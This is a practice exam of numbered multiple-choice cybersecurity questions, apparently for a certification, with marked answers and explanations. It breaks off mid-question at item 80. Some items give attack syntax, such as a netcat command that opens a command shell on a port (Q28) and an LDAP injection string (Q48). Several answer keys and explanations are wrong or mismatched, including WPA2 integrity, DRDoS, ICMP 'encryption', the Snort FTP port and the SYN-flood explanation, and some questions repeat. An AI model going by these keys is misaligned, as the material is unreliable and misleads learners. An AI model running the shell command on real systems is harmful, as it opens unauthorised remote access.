Q 4

The document contains a series of 120 questions and answers related to cybersecurity topics, including network protocols, security measures, and attack types. Each question is followed by a correct answer and an explanation of the concepts involved. The content is designed to test knowledge in areas such as information security laws, encryption methods, and various types of cyber attacks.

Uploaded by

dg6699work

120 QUESTIONS:

-----------------------------------------------------------------------------------

1.What is the default port number for syslog?


514-------------------
69
21
23
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
Syslog's default value is 514.
Even if you did not know this, the other options are well-known default ports
(FTP, Telnet, TFTP), so you can rule them out.

2.Which of the following statements are true? (Choose two.)


WebGoat is maintained by OWASP. -------------------
WebGoat can be installed on Windows or Linux.-------------------
WebGoat is designed for Apache systems only.
WebGoat is maintained by the IETF.
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
WebGoat has 30 or so "lessons" that illustrate how security vulnerabilities work on
a system.
It is maintained by OWASP, can be installed on almost any platform, works well with
Java and .NET, and provides the ideal "black box" testing environment for both
beginners and experienced pen testers to train on without fear of breaking
something.

3.Which of the following best describes an effort to identify systems that are
critical for the continuation of operation for the organization?
MTD
BCP
BIA-------------------
DRP
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
This description is best matched by the Business Impact Analysis.
Although maximum tolerable downtime is part of the process, and a continuity plan
does address it, a BIA is the actual process for identifying those important systems.

4.Enacted in 2002, this U.S. law requires every Federal agency to implement
information security programs, including significant reporting on compliance and
accreditation. What is this law?
FISMA-------------------
OSSTM
NIST 800-53
HIPAA
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
FISMA has been in effect since 2002 and was last revised in 2014.
It delegated certain information security duties to NIST, OMB, and other government
agencies, and appointed the Department of Homeland Security (DHS) as the
operational lead for budgets and security guidelines.

5.Brad has done some research and decided a certain set of systems on his network
fails once every ten years. The purchase price for each of these systems is 1,200.
In addition, Brad finds that the administrators on staff, who earn $50 an hour,
estimate five hours to replace a machine. Five employees, earning $25 an hour,
depend on each system and will be completely unproductive while it is down. If
you were to ask Brad for an ALE on these devices, what would he answer?
$207.50-------------------
$2075
$120
$1200
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
ALE = ARO × SLE.
Divide the number of occurrences by the number of years (1 occurrence / 10 years =
0.1) to get ARO.
To calculate SLE, add the purchase price (1200) to the time required to replace
(5*50 = 250) and the amount of lost work (5 hours*5 employees*25 = 625).
In this scenario, the total is $2075. ALE = 0.1*2075, which equals $207.50.

6.Which of the following tools is the best option for rooting the device if you
wish to gain administrative privileges over your Android device?
Pangu
SuperOneClick-------------------
evasi0n7
Cydia
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
SuperOneClick is a rooting tool for Android. The rest are iOS jailbreaking options.

7.Which of the following provides for integrity in WPA2?


AES-------------------
TKIP
CCMP
RADIUS
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
For integrity, the Counter Mode with Cipher Block Chaining Message Authentication
Code Protocol (say that three times fast) utilizes Message Integrity Codes (MICs).

8.User A is writing a sensitive email message to user B outside the local network.
User A has chosen to use PKI to secure his message and ensure only user B can read
the sensitive email. At what layer of the OSI model does the encryption and
decryption of the message take place?
A. Application
B. Transport
C. Session
D. Presentation
Correct Answer: D
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
The presentation layer, or layer 6 of the OSI model, is typically responsible for
encryption and decryption.

9.Which UDP port does Network Time Protocol (NTP) use as its primary means of
communication?
A. 113
B. 69
C. 123
D. 161
Correct Answer: C

10.Which of the following secures against man-in-the-middle attacks in WPA?


CCMP
AES
MIC-------------------
EAP
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
In WPA, MIC provides integrity checking, ensuring that frames are real and have not
been tampered with.
It does this in part by using a sequence number—if any come out of order, the
entire session is dropped.

11.Operations promotes the use of mobile devices in the enterprise, and security
disagrees, given that multiple risks are associated with adding mobile devices to
the network. Which action will provide some protection against those risks?
Implement MDM.-------------------
Implement WPA.
Add MAC filtering to all WAPs.
Ensure all WAPs are from a single vendor.
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
Mobile Device Management will not eliminate all of the risks associated with the
ongoing use of mobile devices on your network, but it will help.

12.Which of the following is the best choice for performing a bluebugging attack?
Blooover-------------------
BBProxy
btCrawler
PhoneSnoop
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
Blooover is intended to be used for bluebugging.
Blackberry utilities include BBProxy and PhoneSnoop, while btCrawler is a discovery
tool.

13.You are discussing wireless security with your client, who tells you he feels
safe with his network because he has turned off SSID broadcasting. Which of the
following is a true statement regarding his attempt at security?
Unauthorized users will still be able to connect because the SSID is still sent in
all packets, and a sniffer can easily discern the string.-------------------
Unauthorized users will not be able to associate because they must know the SSID in
order to connect.
Unauthorized users will not be able to connect because DHCP is tied to SSID
broadcast.
Unauthorized users will still be able to connect because nonbroadcast SSID puts the
AP in ad hoc mode.
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
Turning off an SSID's broadcast is a smart first step, but SSIDs have no security
implications.
The SSID is included in every packet, whether broadcast from the AP or not.

14.Which of the following secures against man-in-the-middle attacks in WPA?


CCMP
AES
MIC-------------------
EAP
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
In WPA, MIC provides integrity checking, ensuring that frames are real and have not
been tampered with.
It does this in part by using a sequence number—if any come out of order, the
entire session is dropped.

15.Which jailbreaking method will keep the phone jailbroken even after it is
rebooted?
Untethered------------------
Rooted
Tethered
Semi-tethered
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
With untethered jailbreaking, the device remains jailbroken indefinitely, with or
without a connection to another device.

16.Which of the following provides for integrity in WPA2?


AES
CCMP-------------------
TKIP
RADIUS
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
For integrity, the Counter Mode with Cipher Block Chaining Message Authentication
Code Protocol (say that three times fast) utilizes Message Integrity Codes (MICs).

17.Which of the following methods is the best way to crack the network key if a
WPA2 wireless network is discovered during a pen test?
Capture a large amount of initialization vectors and crack the key inside.
Use a sniffer to capture the SSID.
WPA2 cannot be cracked.
Capture the WPA2 authentication traffic and crack the key.-------------------
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
WPA2 is a strong encryption method, but with enough time, practically everything
can be hacked.
Capturing the password pairwise master key (PMK) during the handshake is the only
method to achieve it, and even then it's very difficult if the password is complex.

18.Which of the following is a true statement?


SSIDs are important for identifying networks but do little to nothing for
security.-------------------
Configuring a strong SSID is a vital step in securing your network.
An SSID should always be more than eight characters in length.
An SSID should never be a dictionary word or anything easily guessed.
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
An SSID serves no purpose other than to identify the network. It is not intended to
be a security measure.

19.Which wireless technology uses RC4 for encryption?


WAP
WPA2
WEP-------------------
WPA
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
WEP utilizes RC4, which is one of the reasons it is readily hacked and is not
regarded as a secure choice.

20.Which wireless encryption technology makes use of temporal keys?


WAP
WPA-------------------
WEP
EAP
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
WPA utilizes temporal keys, making it a far more secure encryption option than WEP.

21.Which of the following best describes a teardrop attack?


The attacker sends several overlapping, extremely large IP
fragments.-------------------
The attacker sends a packet with the same source and destination address.
The attacker sends UDP Echo packets with a spoofed address.
The attacker uses ICMP broadcast to DoS targets.
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
The reassembly of fragments takes down the target in a teardrop attack.

22.Which of the following propagates without human interaction?


Trojan
MITM
Worm-------------------
Virus
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
Worms, like Skynet from the Terminator movies, do not need us.

23.Which of the following does not define a method of data transmission that
violates a security policy?
Session hijacking
Covert channel
Backdoor channel
Overt channel-------------------
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
Overt channels are legal and are utilized legally. Everything else on the list is
naughty.

24.How does Tripwire (and similar applications) protect against Trojan attacks?
Tripwire is a file-integrity-checking application that rejects malware packets
intended for the kernel.
Tripwire is a file-integrity-checking application that notifies you when a system
file has been altered, potentially indicating malware.-------------------
Tripwire is an AV application that quarantines and removes malware immediately.
Tripwire is an AV application that quarantines and removes malware after a scan.
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
Tripwire is a well-known file integrity verification application that can assist in
the prevention of Trojans by alerting you instantly when a critical file is altered.

25.Choose the best description of a DRDoS.


Multiple intermediary machines send the attack at the behest of the attacker.
The attacker sends thousands upon thousands of SYN packets to the machine with a
false source IP address.-------------------
The attacker sends thousands of SYN packets to the target but never responds to any
of the return SYN/ACK packets.
The attack involves sending a large number of garbled IP fragments with
overlapping, oversized payloads to the target machine.
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
For all intents and purposes, a distributed reflection denial of service (DRDoS)
assault is a botnet.
Secondary systems carry out the attacks, allowing the perpetrator to stay
undetected.

26.During a TCP data exchange, the client provided a sequence number of 100, while
the server provided a sequence number of 500. During acknowledgments, the packet
displays the agreed-upon sequence numbers 101 and 501, respectively. With a window
size of 5, which sequence numbers would the server willingly accept as part of this
session?
102 through 501
Anything above 501
102 through 106-------------------
102 through 502
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
Beginning with the acknowledged sequence number 101, the server will accept packets
102 through 106 before providing an acknowledgment.

27.Which virus type is executed only when a specific condition is met?


Sparse infector-------------------
Multipartite
Cavity
Metamorphic
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
Sparse infector viruses are activated only when a specified condition is satisfied.
For example: when Calculator is launched for the sixth time, whamm - the virus
executes.

28.Which is the appropriate syntax for creating a command shell on port 56 using
Netcat on Windows systems?
nc -L 56 -t -e cmd.exe-------------------
nc -r 56 -c cmd.exe
nc -p 56 -o cmd.exe
nc -port 56 -s -o cmd.exe
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
To leave a command shell open on port 56, this is the correct syntax for using
Netcat.

29.Which DoS category consumes all available bandwidth for the system or service?
TCP state-exhaustion attacks
Volumetric attacks-------------------
Fragmentation attacks
Application attacks
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
For the system or service, volumetric attacks consume all available bandwidth.

30.Which of the following is a recommendation to protect against session hijacking?
(Select two answers.)
Use a file verification application, such as Tripwire.
Use only nonroutable protocols.
Implement ICMP throughout the environment.-------------------
Use unpredictable sequence numbers.-------------------
Use a good password policy.
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
Unpredictable sequence numbers make session hijacking practically difficult, and
integrating ICMP (which provides encryption and authentication services) is
probably also a good idea.

31.Which of the following attacks do not use ICMP? (Select two answers.)
Peer to peer-------------------
Smurf
SYN flood-------------------
Ping of Death
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
A SYN flood, like a peer-to-peer attack, does not utilize ICMP at all.

32.Which of the following is not a method used to control or mitigate against
static electricity in a computer room?
A humidity control system
Proper electrical grounding
Anti-static wrist straps
Positive pressure-------------------
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
Positive pressure is great for keeping dust and other pollutants out of the room,
but it does little to combat static electricity on its own.

33.Employee background checks, device risk assessments, and key management and
storage rules are all examples of __________ measures in physical security.
operational-------------------
physical
technical
None of the above
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
To enforce a security-minded operation, operational measures are the policies and
procedures you set up.

34.An attacker does a Whois search on a target company and finds the technical
point of contact (POC) and site ownership e-mail addresses. He then composes an
e-mail to the owner from the technical POC, instructing him to visit a link to view
the site's online statistics. Instead, the link leads to a bogus website where
the owner's credentials are taken. What type of attack is this?
Spear phishing-------------------
Phishing
Human based
Man in the middle
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
Spear phishing happens when an e-mail is delivered to a specified audience, even if
that audience consists of only one individual.
In this case, the attacker used recon data to build an e-mail that was more
realistic to the intended target and hence more successful.

35.An attacker, Jim, creates a fake ID badge and waits next to an entry door to a
secured facility. An authorized user swipes a key card and opens the door, and Jim
follows the user inside. Which social engineering attack is in play?
Phishing
Shoulder surfing
Piggybacking
Tailgating-------------------
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
Tailgating occurs when an attacker wears a fraudulent admission badge and follows
an authorized user inside.

36.During a black-box pen test you attempt to pass IRC traffic over port 80/TCP
from a compromised web enabled host. The traffic gets blocked; however, outbound
HTTP traffic is unimpeded. What type of firewall is inspecting outbound traffic?
A. Circuit
B. Stateful
C. Application
D. Packet Filtering
Correct Answer: C

37.The following is an SOA record obtained via a zone transfer. What is the name of
the domain's authoritative DNS server, and how frequently will secondary servers
check in for updates?
Hidden @ IN SOA DNSRV1.anycomp.com. postmaster.anycomp.com.
(
4 ; serial number
3600 ; refresh [1h]
600 ; retry [10m]
86400 ; expire [1d]
3600 ) ; min TTL [1h]
DNSRV1.anycomp.com, 3,600 seconds-------------------
postmaster.anycomp.com, 600 seconds
DNSRV1.anycomp.com, 600 seconds
DNSRV1.anycomp.com, 4 seconds
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
The SOA always begins by defining the authoritative server (in this example,
DNSRV1), followed by e-mail contact information along with a few additional items.
The refresh time specifies how frequently secondary servers will check for updates—
in this example, 3,600 seconds (1 hour).

38.Which DNS record allows you to alias both services to the same record (IP
address) if you have an FTP service and an HTTP site on a single server?
NS
CNAME-------------------
PTR
SOA
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
CNAME records are used to create aliases in a zone.

39.Which of the following best describes the role that CSIRT - US Computer Security
Incident Response Team provides?
Vulnerability measurement and assessments for the U.S. Department of Defense.
Pen test registration for public and private sector.
A reliable and consistent point of contact for all incident response services for
associates of the Department of Homeland Security.-------------------
Incident response services for all Internet providers.
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
In collaboration with the Department of Homeland Security, CSIRT provides incident
response services to any user, company, agency, or organization.

40.While footprinting a network, you successfully perform a zone transfer. Which
DNS record in the zone transfer indicates the company's e-mail server?
EM
MX-------------------
SOA
PTR
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
MX records define a server as an e-mail server.
An associated A record will define the name-to-IP-address translation for the
server.

41.You are configuring Snort rules and want an alert message of "Attempted FTP" on
any FTP packet originating from an outside IP and destined for one of your internal
hosts. Which of the following rules is correct for this situation?
alert tcp $EXTERNAL_NET any -> $HOME_NET 25 (msg:"Attempted FTP")-------------------
alert tcp $EXTERNAL_NET any -> $HOME_NET 21 (msg:"Attempted FTP")
alert tcp $EXTERNAL_NET any -> $HOME_NET 23 (msg:"Attempted FTP")
alert tcp $HOME_NET 21 -> $EXTERNAL_NET any (msg:"Attempted FTP")
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
Snort rules always follow the same syntax: action protocol src address src port ->
dest address port (options).

42.Which Wireshark display filter displays all packets containing the term Facebook?
tcp contains facebook-------------------
tcp.all contains ==facebook
display==facebook
content==facebook
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
The appropriate Wireshark display filter has the form tcp contains followed by the
search string.

43.Machine A (MAC address 00-01-02-AA-BB-CC) and Machine B (MAC address
00-01-02-BB-CC-DD) are on the same subnet. Machine C is on a different subnet and
has the address 00-01-02-CC-DD-EE. Machine B sends a message to Machine C while the
attacker is sniffing on the fully switched network. Which of the following
conditions would be required for an attacker on Machine A to get a copy of this
message?
The ARP cache of Machine A would need to be poisoned, changing the entry for
Machine C to 00-01-02-BB-CC-DD.
The ARP cache of the router would need to be poisoned, changing the entry for
Machine A to 00-01-02-CC-DD-EE.
The ARP cache of Machine B would need to be poisoned, changing the entry for the
default gateway to 00-01-02-AA-BB-CC.-------------------
The ARP cache of Machine C would need to be poisoned, changing the entry for the
default gateway to 00-01-02-AA-BB-CC.
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
ARP poisoning is performed on the computer that generates the frame - the sender.
When the sender machine's default gateway entry is changed, all packets destined
for an IP address outside the subnet are routed to the attacker.
It is pointless to change the ARP cache on the other machine or the router.

44.An attacker attached a laptop to a switch port and activated a sniffer. The NIC
is set to promiscuous mode, and the laptop is left alone for a few hours to collect
information. Which of the following statements are true?
The packet capture will display all traffic intended for the
laptop.-------------------
The packet capture will provide only the MAC addresses of the laptop and the
default gateway.
The packet capture will provide the MAC addresses of other machines connected to
the switch.-------------------
The packet capture will display all traffic intended for the default gateway.
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
Switches filter or flood traffic based on the address.
Broadcast traffic, such as ARP requests and answers, is flooded to all ports.
Unicast traffic, such as traffic intended for the laptop itself or the default
gateway, is sent only to the port on which the machine rests.

45.Your customer tells you they know beyond a doubt that an attacker is sending
messages back and forth from their network, yet the IDS doesn't appear to be
alerting on the traffic. Which of the following is most likely true?
The attacker is sending messages over an SSL tunnel.-------------------
The attacker has configured a trunk port on a switch.
The attacker has corrupted ACLs on every router in the network.
The attacker has set up port security on network switches.
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
Encryption is the bane of an IDS's existence.
The IDS is blind as a bat if traffic is encrypted.

46.Which of the following works at Layer 5 of the OSI model?


Circuit-level firewall-------------------
Stateful firewall
Packet-filtering firewall
Application-level firewall
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
This one, I must admit, is difficult.
Yes, circuit-level firewalls function at Layer 5.
Stateful firewalls can be considered to operate at Layer 5, however, their primary
concentration is on Layers 3 and 4.
Application-level firewalls operate at Layer 7.

47.A security administrator sets the HttpOnly flag in cookies. Which of the
following is the administrator most likely attempting to mitigate against?
XSS-------------------
CSRF
CSSP
Buffer overflow
SQL injection
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
XSS is the only response that makes sense out of the options provided.
This flag stops a client-side script from accessing cookies.

48.A security administrator monitoring logs comes across a user login attempt that
reads UserJoe)(&). What can you infer from this username login attempt?
The attacker is attempting SOAP injection.
The attacker is attempting SQL injection.
The attacker is attempting LDAP injection.-------------------
The attacker is attempting directory traversal.
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
The )(&) denotes an attempt at LDAP injection.

49.A business's accounting department detects multiple orders that appear to have
been placed in error. While investigating the issue, you learn that the pricing of
items on various web orders does not appear to match the published pricing on the
public site. You verify that neither the website nor the ordering database seems to
have been compromised. Furthermore, there were no alarms in the Snort logs
indicating a probable attack on the online application. Which of the following
might explain the current attack?
The attacker has used SQL injection to update the database to reflect new prices
for the items.
The attacker used Metasploit to take control of the web application.
The attacker takes control of the web application.
The attacker has copied the source code to his machine and altered hidden fields to
modify the purchase price of the items.-------------------
The attacker has taken advantage of a server-side include that altered the price.
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
Because the logs and IDSs reveal no direct attack in this example, the attacker
most likely copied the source code to his own computer and changed the
hidden "price" fields on the order form. All other forms of attack would have
readily shown themselves in some shape or other.

50.Which of the following is a true statement?


Configuring the web server to send random challenge tokens is the best mitigation
for parameter-manipulation attacks.
Configuring the web server to send random challenge tokens is the best mitigation
for CSRF attacks.-------------------
Configuring the web server to send random challenge tokens is the best mitigation
for buffer overflow attacks.
Configuring the web server to send random challenge tokens is the best mitigation
for XSS attacks.
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
Forged requests that ride on your authenticated session through your browser can
be greatly reduced by ensuring that each request contains a challenge token; if
the server receives a request without a token, it is treated as illegitimate and
dropped.
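The challenge-token check from question 50, as an added example that is not part of the original question set; the in-memory session store and the function names are assumptions. The browser attaches the session cookie to any request, including one triggered by another site, but only pages served by the application carry the per-session token, so a state-changing request without it is dropped.

```python
import hmac
import secrets

# Hypothetical in-memory session store: session id -> session data.
CSRF_SESSIONS = {}

# Methods that must not change state and therefore need no token.
SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}


def csrf_login(user: str) -> str:
    """Create a session with its own random challenge token; return the cookie value."""
    sid = secrets.token_urlsafe(32)
    CSRF_SESSIONS[sid] = {"user": user, "csrf": secrets.token_urlsafe(32)}
    return sid


def csrf_form_token(sid: str) -> str:
    """Token the server embeds in every form it renders for this session."""
    return CSRF_SESSIONS[sid]["csrf"]


def csrf_handle(method: str, cookie_sid: str, form: dict):
    """Return (status, message) for a request carrying the session cookie."""
    session = CSRF_SESSIONS.get(cookie_sid)
    if session is None:
        return 401, "no session"
    if method not in SAFE_METHODS:
        supplied = form.get("csrf_token", "")
        # Constant-time comparison; a missing token compares unequal.
        if not hmac.compare_digest(supplied.encode(), session["csrf"].encode()):
            return 403, "missing or invalid challenge token"
    return 200, f"{method} accepted for {session['user']}"


if __name__ == "__main__":
    sid = csrf_login("alice")
    # Request from the application's own form: cookie plus token.
    print(csrf_handle("POST", sid, {"csrf_token": csrf_form_token(sid), "amount": "10"}))
    # Constructed cross-site request: cookie is attached, token is not known.
    print(csrf_handle("POST", sid, {"amount": "10"}))
```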

51.If you wanted a lightweight protocol to send real-time data over, which of these
would you use?
TCP
UDP-------------------
ICMP
HTTP
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
TCP uses a three-way handshake, which is fairly heavyweight.
HTTP uses TCP and adds more on top of it.
ICMP is used for control messages.
UDP has very little overhead and is commonly used for real-time data transport.

52.Which of the following is true regarding n-tier architecture?
N-tier allows each tier to be configured and modified
independently.-------------------
N-tier is usually implemented on one server.
N-tier always consists of presentation, logic, and data tiers.
Each tier must communicate openly with every other tier.
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
While often built in three tiers, n-tier merely indicates that you have three or
more separately monitored, controlled, and maintained servers, each of which
provides a distinct service or tasking.

53.What is the purpose of a SYN flood? A SYN flood takes advantage of the three-way
handshake. A SYN message alone will consume a connection buffer at the operating
system. Until the operating system has passed the three-way handshake, the request
won’t make it to the webserver at the Application layer. SYN is not a header flag
used with UDP.
Fill up connection buffers at the Application layer
Fill up connection buffers at the operating system-------------------
Fill up connection buffers for UDP
Fill up connection buffers in the webserver
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
The http-methods script examines a target to see whether HTTP methods are available
(by sending an HTTP OPTIONS request).
Why would an attacker do this? You already know the solution to this question if
you know what GET, POST, and PUT do.

54.What best describes a wrapping attack?
A SOAP message is intercepted, data in the envelope is changed, and then the data
is sent/replayed.-------------------
The virtual machine management system on the physical machine is corrupted or
administrative control is gained over it.
CSRF-type attack against cloud computing resources.
An attack involving leveraging a new or existing VM on a physical device against
another VM.
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
Wrapping attacks entail interfering with SOAP messages and masquerading them as
legitimate.

55.Internet Protocol Security IPsec is actually a suite of protocols. Each protocol
within the suite provides different functionality. Collectively, IPsec does
everything except:
A. Protect the payload and the headers
B. Encrypt
C. Work at the Data Link Layer
D. Authenticate
Correct Answer: C

56.Amazon’s EC2 provides virtual machines that can be controlled through a service
API. Which of the following best defines this service?
SaaS
PaaS
Public
IaaS-------------------
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
Amazon's EC2 service provides resizable computational capacity in the cloud via VMs
that can be controlled via an API, thereby meeting the definition of IaaS.

57.Which of the following cloud computing attacks can best be described as a CSRF
attack?
Session riding-------------------
Side channel
Cross-guest VM breach
Hypervisor attack
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
Session riding is simply CSRF under a different name, applied to cloud services
instead of traditional data centers.

58.Cloud computing has many benefits. Which of the following security principles
best applies to cloud security?
Separation of duties-------------------
Need to know
Least privilege
Job rotation
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
While using cloud computing does not entirely resolve the separation of duties, it
is the only option available.
By definition, the cloud may separate the data owner from the data custodian (the
cloud provider assumes the role).

59.Which component acts to manage the use, performance, and delivery of cloud
services, as well as the relationships between providers and subscribers in the
NIST Cloud Computing Reference Architecture?
Cloud consumer
Cloud provider
Cloud broker-------------------
Cloud carrier
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
The broker “serves as an intermediary between the consumer and the provider,
guiding consumers through the complexities of cloud service offerings and perhaps
creating value-added cloud services.”

60.Which of the following cloud computing models is geared toward software
development?
SaaS
Private
IaaS
PaaS-------------------
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
PaaS is a development platform that allows subscribers to construct apps without
having to establish the infrastructure required to develop and publish software.

61.Google Docs and Salesforce CRM are two examples of which cloud computing model?
IaaS
PaaS
SaaS-------------------
Public
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
Software as a Service best describes this.
SaaS is simply a software distribution model in which the provider provides
subscribers with on-demand applications.

62.Which component acquires and uses cloud products and services in the NIST Cloud
Computing Reference Architecture?
Cloud provider
Cloud carrier
Cloud consumer-------------------
Cloud broker
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
The subscriber is the customer who contracts with a supplier for services.

63.Which of the following best represents SOA?
An API that allows different components to communicate-------------------
A single database accessed by multiple sources
File server
An application containing both the user interface and the code allowing access to
the data
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
The best available option is Service Oriented Architecture (SOA), which is all
about software components giving information to one another through a network.

64.Which of the following has the responsibility of transmitting the data in the
NIST Cloud Computing Reference Architecture?
Cloud broker
Cloud carrier-------------------
Cloud consumer
Cloud provider
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
The carrier, such as the power distributor for the electric grid, acts as an
intermediary for connectivity and transit between the subscriber and the provider.

65.An attacker uses a Metasploit auxiliary exploit to send a series of small
messages to a server at regular intervals, and the server responds with 64 bytes of
data from its memory. Which is the best description of the attack being used?
Heartbleed-------------------
POODLE
FREAK
DROWN
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
Heartbleed utilizes SSL's data-echoing acknowledgment heartbeat.
OpenSSL versions 1.0.1 through 1.0.1f are vulnerable to this technique.

66.An attacker attaches a rogue router in a network. He wants to redirect traffic
to a LAN attached to his router as part of a man-in-the-middle attack. What measure
on behalf of the legitimate admin can mitigate this attack?
A. Make sure that legitimate network routers are configured to run routing
protocols with authentication.
B. Disable all routing protocols and only use static routes
C. Only using OSPFv3 will mitigate this risk.
D. Redirection of the traffic cannot happen unless the admin allows it explicitly.
Correct Answer: A

67.What does the -oX flag do in an Nmap scan?
A. Perform an eXpress scan
B. Output the results in truncated format to the screen
C. Output the results in XML format to a file
D. Perform an Xmas scan
Correct Answer: C

68.What is the known plaintext attack used against DES which gives the result that
encrypting plaintext with one DES key followed by encrypting it with a second DES
key is no more secure than using a single key?
A. Man-in-the-middle attack
B. Meet-in-the-middle attack
C. Replay attack
D. Traffic analysis attack
Correct Answer: B

69.You need to deploy a new web-based software package for your organization. The
package requires three separate servers and needs to be available on the
Internet. What is the recommended architecture in terms of server placement?
A. All three servers need to be placed internally
B. A web server facing the Internet, an application server on the internal network,
a database server on the internal network
C. A web server and the database server facing the Internet, an application server
on the internal network
D. All three servers need to face the Internet so that they can communicate between
themselves
Correct Answer: B

70.An attacker, using a rogue wireless AP, performed an MITM attack and injected an
HTML code to embed a malicious applet in all HTTP connections. When users accessed
any page, the applet ran and exploited many machines. Which one of the following
tools did the hacker probably use to inject HTML code?
A. Wireshark
B. Ettercap
C. Aircrack-ng
D. Tcpdump
Correct Answer: B

71.Which mode of IPSec should you use to assure security and confidentiality of
data within the same LAN?
A. ESP transport mode
B. ESP confidential
C. AH promiscuous
D. AH Tunnel mode
Correct Answer: A

72.Email is transmitted across the Internet using the Simple Mail Transport
Protocol. SMTP does not encrypt email, leaving the information in the message
vulnerable to being read by an unauthorized person. SMTP can upgrade a connection
between two mail servers to use TLS. Email transmitted by SMTP over TLS is
encrypted. What is the name of the command used by SMTP to transmit email over TLS?
A. OPPORTUNISTICTLS
B. UPGRADETLS
C. FORCETLS
D. STARTTLS
Correct Answer: D

73.In the field of cryptanalysis, what is meant by a `rubber-hose` attack?
A. Forcing the targeted keystream through a hardware-accelerated device such as an
ASIC.
B. A backdoor placed into a cryptographic algorithm by its creator.
C. Extraction of cryptographic secrets through coercion or torture.
D. Attempting to decrypt ciphertext by making logical assumptions about the
contents of the original plaintext.
Correct Answer: C

74.Which of the following tools is used to analyze the files produced by several
packet-capture programs such as tcpdump, WinDump, Wireshark, and EtherPeek?
A. tcptrace
B. Nessus
C. OpenVAS
D. tcptraceroute
Correct Answer: A

75.Which of the following Linux commands will resolve a domain name into IP
address?
A. >host -t a hackeddomain.com
B. >host -t ns hackeddomain.com
C. >host -t soa hackeddomain.com
D. >host -t AXFR hackeddomain.com
Correct Answer: A

76.Bob, a network administrator at BigUniversity, realized that some students are
connecting their notebooks in the wired network to have Internet access. In the
university campus, there are many Ethernet ports available for professors and
authorized visitors but not for students. He identified this when the IDS alerted
for malware activities in the network. What should Bob do to avoid this problem?
A. Disable unused ports in the switches
B. Separate students in a different VLAN
C. Use the 802.1x protocol
D. Ask students to use the wireless network
Correct Answer: C
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
A. You cannot disable unused ports because it is mentioned that guests and
professors may use any port to connect; you never know which port they will use.
B. Separate students in a different VLAN - No, even if you separate them, students
will take their laptops and connect to other switches or ports.
D. Ask students to use the wireless network - You cannot control students by asking
them not to do it.

77.An Intrusion Detection System (IDS) has alerted the network administrator to a
possibly malicious sequence of packets sent to a Web server in the network's
external DMZ. The packet traffic was captured by the IDS and saved to a PCAP file.
What type of network tool can be used to determine if these packets are genuinely
malicious or simply a false positive?
A. Protocol analyzer
B. Network sniffer
C. Intrusion Prevention System (IPS)
D. Vulnerability scanner
Correct Answer: A

78.Why should the security analyst disable/remove unnecessary ISAPI filters?
A. To defend against social engineering attacks
B. To defend against webserver attacks
C. To defend against jailbreaking
D. To defend against wireless attacks
Correct Answer: B

79.Which of the following is a component of a risk assessment?
A. Administrative safeguards
B. Physical security
C. DMZ
D. Logical interface
Correct Answer: A

80.Wilson, a professional hacker, targets an organization for financial benefit and
plans to compromise its systems by sending malicious emails. For this purpose, he
uses a tool to track the emails of the target and extracts information such as
